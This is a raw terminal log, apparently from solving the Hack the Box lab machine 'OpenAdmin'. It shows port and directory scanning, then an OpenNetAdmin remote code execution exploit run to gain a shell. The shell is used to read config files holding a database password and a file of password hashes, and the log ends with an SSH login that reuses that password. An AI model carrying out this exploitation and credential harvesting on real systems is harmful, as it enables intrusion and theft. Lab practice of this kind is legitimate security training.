Hack the Box - OpenAdmin
nmap
drib
kali@kali:~$ nmap -v -A 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 01:25 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating Ping Scan at 01:25
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 01:25, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:25
Completed Parallel DNS resolution of 1 host. at 01:25, 2.24s elapsed
Initiating Connect Scan at 01:25
Scanning 10.10.10.171 [1000 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Completed Connect Scan at 01:25, 14.28s elapsed (1000 total ports)
Initiating Service scan at 01:25
Scanning 2 services on 10.10.10.171
Completed Service scan at 01:25, 6.36s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 01:25
Completed NSE at 01:25, 4.95s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.69s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.34 seconds
kali@kali:~$ dirb http://10.10.10.171
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 19 01:27:24 2020
URL_BASE: http://10.10.10.171/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.171/ ----
==> DIRECTORY: http://10.10.10.171/artwork/
+ http://10.10.10.171/index.html (CODE:200|SIZE:10918)
--> Testing: http://10.10.10.171/kb_results
==> DIRECTORY: http://10.10.10.171/music/
+ http://10.10.10.171/server-status (CODE:403|SIZE:277)
---- Entering directory: http://10.10.10.171/artwork/ ----
==> DIRECTORY: http://10.10.10.171/artwork/css/
==> DIRECTORY: http://10.10.10.171/artwork/fonts/
==> DIRECTORY: http://10.10.10.171/artwork/images/
+ http://10.10.10.171/artwork/index.html (CODE:200|SIZE:14461)
==> DIRECTORY: http://10.10.10.171/artwork/js/
---- Entering directory: http://10.10.10.171/music/ ----
==> DIRECTORY: http://10.10.10.171/music/css/
==> DIRECTORY: http://10.10.10.171/music/img/
+ http://10.10.10.171/music/index.html (CODE:200|SIZE:12554)
==> DIRECTORY: http://10.10.10.171/music/js/
---- Entering directory: http://10.10.10.171/artwork/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Apr 19 02:07:21 2020
DOWNLOADED: 13836 - FOUND: 4
ali@kali:~$ nikto -host http://10.10.10.171
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.171
+ Target Hostname: 10.10.10.171
+ Target Port: 80
+ Start Time: 2020-04-19 01:26:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
kali@kali:~$ c
kali@kali:~$ searchsploit opennetadmin
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:/usr/share/exploitdb/exploits/php/webapps$ ./47691.sh whoami
./47691.sh: line 8: $'\r': command not found
./47691.sh: line 16: $'\r': command not found
./47691.sh: line 18: $'\r': command not found
./47691.sh: line 23: syntax error near unexpected token `done'
./47691.sh: line 23: `done'
kali@kali:/usr/share/exploitdb/exploits/php/webapps$ sudo dos2unix 47691.sh
[sudo] password for kali:
dos2unix: converting file 47691.sh to Unix format...
$ kali@kali:/usr/share/exploitdb/exploits/php/webapps$ ./47691.sh http://10.10.10.171/ona/ whoami
$ whoami
www-data
$ whoami
www-data
$ pwd
/opt/ona/www
$
$ cat config/auth_ldap.config.php
'/cn=(.+?),/i');
//$conf['auth']['ldap']['referrals'] = '0';
// Novell E-Directory, anonymous bind example
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=users,ou=example,o=com';
//$conf['auth']['ldap']['mapping']['grps'] = array('groupmembership'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['userfilter'] = '(&(!(loginDisabled=TRUE)))';
//OpenLDAP with superuser bind
//$conf['auth']['ldap']['binddn'] = 'cn=Manager,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=People,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['grouptree'] = 'ou=Group,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['groupfilter'] = '(&(objectClass=posixGroup)(|(memberUid=%{dn})(memberUid=%{user})))';
$ cat config/config.inc.php
'DEFAULT',
/* Used in header.php */
"title" => 'OpenNetAdmin :: ',
"meta_description" => '',
"meta_keywords" => '',
"html_headers" => '',
/* Include Files: HTML */
"html_style_sheet" => "$include/html_style_sheet.inc.php",
"html_desktop" => "$include/html_desktop.inc.php",
"loading_icon" => "
",
/* Include Files: Functions */
"inc_functions" => "$include/functions_general.inc.php",
"inc_functions_gui" => "$include/functions_gui.inc.php",
"inc_functions_db" => "$include/functions_db.inc.php",
"inc_functions_auth" => "$include/functions_auth.inc.php",
"inc_db_sessions" => "$include/adodb_sessions.inc.php",
"inc_adodb" => "$include/adodb/adodb.inc.php",
"inc_adodb_xml" => "$include/adodb/adodb-xmlschema03.inc.php",
"inc_xajax_stuff" => "$include/xajax_setup.inc.php",
"inc_diff" => "$include/DifferenceEngine.php",
/* Settings for dcm.pl */
"dcm_module_dir" => "$base/modules",
"plugin_dir" => "$base/local/plugins",
/* Defaults for some user definable options normally in sys_config table */
"debug" => "2",
"syslog" => "0",
"stdout" => "0",
"log_to_db" => "0",
"logfile" => "/var/log/ona.log",
/* The output charset to be used in htmlentities() and htmlspecialchars() filtering */
"charset" => "utf8",
"php_charset" => "UTF-8",
// enable the setting of the database character set using the "set name 'charset'" SQL command
// This should work for mysql and postgres but may not work for Oracle.
// it will be set to the value in 'charset' above.
"set_db_charset" => TRUE,
);
// Read in the version file to our conf variable
// It must have a v., no number padding, to match the check version code.
if (file_exists($base.'/../VERSION')) { $conf['version'] = trim(file_get_contents($base.'/../VERSION')); }
// The $self array is used to store globally available temporary data.
// Think of it as a cache or an easy way to pass data around ;)
// I've tried to define the entries that are commonly used:
$self = array (
// Error messages will often get stored in here
"error" => "",
// All sorts of things get cached in here to speed things up
"cache" => array(),
// Get's automatically set to 1 if we're using HTTPS/SSL
"secure" => 0,
);
// If the server port is 443 then this is a secure page
// This is basically used to put a padlock icon on secure pages.
if ($_SERVER['SERVER_PORT'] == 443) { $self['secure'] = 1; }
///////////////////////////////////////////////////////////////////////////////
// STYLE SHEET STUFF //
///////////////////////////////////////////////////////////////////////////////
// Colors
$color['bg'] = '#FFFFFF';
$color['content_bg'] = '#FFFFFF';
$color['bar_bg'] = '#D3DBFF';
$color['border'] = '#555555'; //#1A1A1A
$color['form_bg'] = '#FFEFB6';
$color['font_default'] = '#000000';
$color['font_title'] = '#4E4E4E';
$color['font_subtitle'] = '#5A5A5A';
$color['font_error'] = '#E35D5D';
$color['link'] = '#6B7DD1';
$color['vlink'] = '#6B7DD1';
$color['alink'] = '#6B7DD1';
$color['link_nav'] = '#0048FF'; // was '#7E8CD7';
$color['link_act'] = '#FF8000'; // was '#EB8F1F';
$color['link_domain'] = 'green'; // was '#5BA65B';
$color['button_normal'] = '#FFFFFF';
$color['button_hover'] = '#E0E0E0';
// Define some colors for the subnet map:
$color['bgcolor_map_host'] = '#BFD2FF';
$color['bgcolor_map_subnet'] = '#CCBFFF';
$color['bgcolor_map_selected'] = '#FBFFB6';
$color['bgcolor_map_empty'] = '#FFFFFF';
// Much of this configuration is required here since
// a lot of it's used in xajax calls before a web page is created.
$color['menu_bar_bg'] = '#F3F1FF';
$color['menu_header_bg'] = '#FFFFFF';
$color['menu_item_bg'] = '#F3F1FF';
$color['menu_header_text'] = '#436976';
$color['menu_item_text'] = '#436976';
$color['menu_item_selected_bg']= '#B1C6E3';
$color['menu_header_bg'] = '#B1C6E3';
// Style variables (used in PHP in various places)
$style['font-family'] = "Arial, Sans-Serif";
$style['borderT'] = "border-top: 1px solid {$color['border']};";
$style['borderB'] = "border-bottom: 1px solid {$color['border']};";
$style['borderL'] = "border-left: 1px solid {$color['border']};";
$style['borderR'] = "border-right: 1px solid {$color['border']};";
// Include the localized configuration settings
// MP: this may not be needed now that "user" configs are in the database
@include("{$base}/local/config/config.inc.php");
// Include the basic system functions
// any $conf settings used in this "require" should not be user adjusted in the sys_config table
require_once($conf['inc_functions']);
// Include the basic database functions
require_once($conf['inc_functions_db']);
// Include the localized Database settings
$dbconffile = "{$base}/local/config/database_settings.inc.php";
if (file_exists($dbconffile)) {
if (substr(exec("php -l $dbconffile"), 0, 28) == "No syntax errors detected in") {
@include($dbconffile);
} else {
echo "Syntax error in your DB config file: {$dbconffile}
Please check that it contains a valid PHP formatted array, or check that you have the php cli tools installed.
You can perform this check maually using the command 'php -l {$dbconffile}'.";
exit;
}
} else {
require_once($base.'/../install/install.php');
exit;
}
// Check to see if the run_install file exists.
// If it does, run the install process.
if (file_exists($base.'/local/config/run_install') or @$runinstaller or @$install_submit == 'Y') {
// Process the install script
require_once($base.'/../install/install.php');
exit;
}
// Set multibyte encoding to UTF-8
if (@function_exists('mb_internal_encoding')) {
mb_internal_encoding("UTF-8");
} else {
printmsg("INFO => Missing 'mb_internal_encoding' function. Please install PHP 'mbstring' functions for proper UTF-8 encoding.", 0);
}
// If we dont have a ona_context set in the cookie, lets set a cookie with the default context
if (!isset($_COOKIE['ona_context_name'])) { $_COOKIE['ona_context_name'] = $conf['default_context']; setcookie("ona_context_name", $conf['default_context']); }
// (Re)Connect to the DB now.
global $onadb;
$onadb = db_pconnect('', $_COOKIE['ona_context_name']);
// Load the actual user config from the database table sys_config
// These will override any of the defaults set above
list($status, $rows, $records) = db_get_records($onadb, 'sys_config', 'name like "%"', 'name');
foreach ($records as $record) {
printmsg("INFO => Loaded config item from database: {$record['name']}=''{$record['value']}''",5);
$conf[$record['name']] = $record['value'];
}
// Include functions that replace the default session handler with one that uses MySQL as a backend
require_once($conf['inc_db_sessions']);
// Include the GUI functions
require_once($conf['inc_functions_gui']);
// Include the AUTH functions
require_once($conf['inc_functions_auth']);
// Start the session handler (this calls a function defined in functions_general)
startSession();
// Set session inactivity threshold
ini_set("session.gc_maxlifetime", $conf['cookie_life']);
// if search_results_per_page is in the session, set the $conf variable to it. this fixes the /rows command
if (isset($_SESSION['search_results_per_page'])) $conf['search_results_per_page'] = $_SESSION['search_results_per_page'];
// Set up our page to https if requested for our URL links
if (@($conf['force_https'] == 1) or ($_SERVER['SERVER_PORT'] == 443)) {
$https = "https://{$_SERVER['SERVER_NAME']}";
}
else {
if ($_SERVER['SERVER_PORT'] != 80) {
$https = "http://{$_SERVER['SERVER_NAME']}:{$_SERVER['SERVER_PORT']}";
} else {
$https = "http://{$_SERVER['SERVER_NAME']}";
}
}
// DON'T put whitespace at the beginning or end of included files!!!
?>
$ ls /etc/init.d
acpid
apache-htcacheclean
apache2
apparmor
apport
atd
console-setup.sh
cron
cryptdisks
cryptdisks-early
dbus
ebtables
grub-common
hwclock.sh
irqbalance
iscsid
keyboard-setup.sh
kmod
lvm2
lvm2-lvmetad
lvm2-lvmpolld
lxcfs
lxd
mdadm
mdadm-waitidle
mysql
networking
open-iscsi
open-vm-tools
plymouth
plymouth-log
procps
rsync
rsyslog
screen-cleanup
ssh
udev
ufw
unattended-upgrades
uuidd
$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.171:43550 10.10.17.174:5555 CLOSE_WAIT
tcp 0 0 10.10.10.171:43548 10.10.17.174:5555 CLOSE_WAIT
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 10.10.10.171:80 10.10.14.152:48182 ESTABLISHED
tcp6 1 0 10.10.10.171:80 10.10.17.174:53906 CLOSE_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:47590 TIME_WAIT
tcp6 1 0 10.10.10.171:80 10.10.17.174:53897 CLOSE_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:48016 TIME_WAIT
tcp6 0 435 10.10.10.171:80 10.10.14.152:48156 ESTABLISHED
tcp6 0 0 10.10.10.171:80 10.10.14.57:54142 FIN_WAIT2
tcp6 0 0 10.10.10.171:80 10.10.14.152:47728 TIME_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:47878 TIME_WAIT
udp 0 0 127.0.0.53:53 0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] SEQPACKET LISTENING 13966 /run/udev/control
unix 3 [ ] DGRAM 13925 /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 17729 @irqbalance554.sock
unix 2 [ ACC ] STREAM LISTENING 13928 /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 13941 /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 13943 /run/systemd/journal/syslog
unix 2 [ ACC ] STREAM LISTENING 13945 /run/lvm/lvmetad.socket
unix 2 [ ACC ] STREAM LISTENING 13947 /run/systemd/journal/stdout
unix 8 [ ] DGRAM 13949 /run/systemd/journal/socket
unix 4 [ ] DGRAM 13969 /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 16985 /var/lib/lxd/unix.socket
unix 2 [ ACC ] STREAM LISTENING 21686 /var/run/mysqld/mysqld.sock
unix 2 [ ACC ] STREAM LISTENING 16156 /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 16983 /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 16989 /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 16991 /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 16997 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 17000 /run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 17002 @ISCSIADM_ABSTRACT_NAMESPACE
unix 3 [ ] STREAM CONNECTED 20210 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17909
unix 3 [ ] STREAM CONNECTED 19447
unix 3 [ ] STREAM CONNECTED 20225 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 20896 /var/run/dbus/system_bus_socket
unix 3 [ ] DGRAM 13927
unix 3 [ ] STREAM CONNECTED 17123 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 16915 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17109 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 16150
unix 3 [ ] STREAM CONNECTED 21647
unix 3 [ ] STREAM CONNECTED 17645
unix 3 [ ] STREAM CONNECTED 17111 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17646 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17098
unix 3 [ ] STREAM CONNECTED 17021
unix 3 [ ] STREAM CONNECTED 16307
unix 3 [ ] DGRAM 13926
unix 3 [ ] STREAM CONNECTED 17110 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17727 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 16394
unix 3 [ ] STREAM CONNECTED 18406
unix 3 [ ] DGRAM 15487
unix 3 [ ] STREAM CONNECTED 17571 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 178332
unix 3 [ ] STREAM CONNECTED 178333 /var/run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 17570
unix 3 [ ] STREAM CONNECTED 16999
unix 3 [ ] DGRAM 15161
unix 3 [ ] DGRAM 15162
unix 3 [ ] DGRAM 16976
unix 2 [ ] DGRAM 16973
unix 3 [ ] DGRAM 16979
unix 3 [ ] STREAM CONNECTED 15474
unix 3 [ ] STREAM CONNECTED 18247 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 17114
unix 3 [ ] DGRAM 16653
unix 2 [ ] DGRAM 15481
unix 3 [ ] DGRAM 16652
unix 3 [ ] STREAM CONNECTED 17121 /var/run/dbus/system_bus_socket
unix 3 [ ] DGRAM 16977
unix 3 [ ] STREAM CONNECTED 17120
unix 3 [ ] STREAM CONNECTED 20575
unix 3 [ ] STREAM CONNECTED 16643 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 18246
unix 2 [ ] DGRAM 17106
unix 3 [ ] DGRAM 16978
unix 3 [ ] STREAM CONNECTED 18938
unix 3 [ ] STREAM CONNECTED 18072
unix 3 [ ] DGRAM 15489
unix 3 [ ] STREAM CONNECTED 16747
unix 3 [ ] STREAM CONNECTED 16416 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 15051
unix 3 [ ] STREAM CONNECTED 157947 /var/run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 16621 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14095
unix 3 [ ] STREAM CONNECTED 16748 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14887
unix 3 [ ] STREAM CONNECTED 17204
unix 3 [ ] STREAM CONNECTED 17495
unix 2 [ ] DGRAM 16152
unix 3 [ ] STREAM CONNECTED 18073 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17107
unix 3 [ ] STREAM CONNECTED 16723 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 15490
unix 2 [ ] DGRAM 14820
unix 2 [ ] DGRAM 16932
unix 3 [ ] STREAM CONNECTED 16651 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 18439 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17108
unix 3 [ ] STREAM CONNECTED 158839
unix 3 [ ] STREAM CONNECTED 18939 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17725 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 16017
unix 3 [ ] STREAM CONNECTED 15765
unix 3 [ ] STREAM CONNECTED 17913 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 15488
unix 3 [ ] STREAM CONNECTED 17724
unix 2 [ ] DGRAM 17412
unix 3 [ ] STREAM CONNECTED 17496 /run/systemd/journal/stdout
$ ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Apr 18 20:43 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
$ cat /etc/issue
Ubuntu 18.04.3 LTS \n \l
Ubuntu 18.04 - 'lxd' Privilege Escalation | exploits/linux/local/46978.sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
$ ls -al /opt/
total 24
drwxr-xr-x 3 root root 4096 Apr 19 05:39 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 7 www-data www-data 4096 Nov 21 18:23 ona
-rw-r--r-- 1 root root 0 Nov 22 23:49 priv
-rw-r--r-- 1 root root 2 Apr 19 05:32 priv.save
-rw-r--r-- 1 root root 33 Apr 19 05:36 priv.save.1
-rw-r--r-- 1 root root 1210 Apr 19 05:39 priv.save.2
$ ls /opt/priv/
$ cat /opt/priv
$ cat /opt/priv.save
$ cat /opt/priv.save.1
2f907ed450b361b2c2bf4e8795d5b561
$ cat /opt/priv.save.2
2f907ed450b361b2c2bf4e8795d5b561
root:$6$BGk6CBPE$FoDCUgY.1pnYDkqDr4.yNm4jQqnnG7side9P6ApdQWWqLr6t1DHq/iXuNF7F0fkivSYXajUp/bK2cw/D/3ubU/:18222:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18221:0:99999:7:::
jimmy:$6$XnCB2K/6$QALmpgLWhDwUjcNldzgtafb6Tt1dT.uyIfxdhDYOVGdlNgIyDX89hz29P.aDQM9OBSSsI2dJGUYYTmQtdb2zw.:18222:0:99999:7:::
mysql:!:18221:0:99999:7:::
joanna:$6$gmFfLksM$XJl08bIFRUki/Lecq8RKFzFFvleGn9CjiqrQxU4n/l6JZe/FSRbe0I/W3L86yWibCJejfrMzgH3HvUezxhCWI0:18222:0:99999:7:::
2f907ed450b361b2c2bf4e8795d5b561 1291532801
$ cat local/config/database_settings.inc.php
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
kali@kali:~$ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 19 07:41:27 UTC 2020
System load: 1.18 Processes: 115
Usage of /: 49.3% of 7.81GB Users logged in: 0
Memory usage: 19% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls -al
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:d78 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:d78 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:0d:78 txqueuelen 1000 (Ethernet)
RX packets 140 bytes 16126 (16.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 103 bytes 23013 (23.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 304 bytes 22008 (22.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 304 bytes 22008 (22.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
jimmy@openadmin:~$
